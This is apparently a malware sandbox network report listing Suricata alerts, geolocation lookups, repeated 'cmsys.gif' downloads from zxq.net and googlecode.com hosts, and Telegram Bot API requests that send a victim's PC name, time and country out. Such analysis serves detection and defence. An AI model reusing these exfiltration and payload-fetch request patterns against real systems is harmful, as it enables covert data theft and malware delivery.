System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System\explorer.exe	Network Connect: 51.81.194.202 443	Jump to behavior
Source: C:\Windows\System\explorer.exe	Network Connect: 64.233.167.82 80	Jump to behavior
Source: C:\Windows\System\explorer.exe	Network Connect: 66.102.1.82 80	Jump to behavior

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

TCP traffic: 192.168.2.4:49786 -> 162.215.121.116:587

Source: global traffic

TCP traffic: 192.168.2.4:53575 -> 162.159.36.2:53

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:287400%0D%0ADate%20and%20Time:%2005/03/2025%20/%2015:43:15%0D%0ACountry%20Name:%20United%20States%0D%0A[%20287400%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:287400%0D%0ADate%20and%20Time:%2005/03/2025%20/%2014:33:57%0D%0ACountry%20Name:%20United%20States%0D%0A[%20287400%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org
Source: unknown	DNS query: name: checkip.dyndns.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49744 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49764 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49758 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49749 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49765 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49743 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49762 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49747 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49775 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49755 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49780 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49761 -> 104.21.112.1:443

Source: global traffic

TCP traffic: 192.168.2.4:49786 -> 162.215.121.116:587

Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /what-happened-to-the-old-zxq-website/ HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
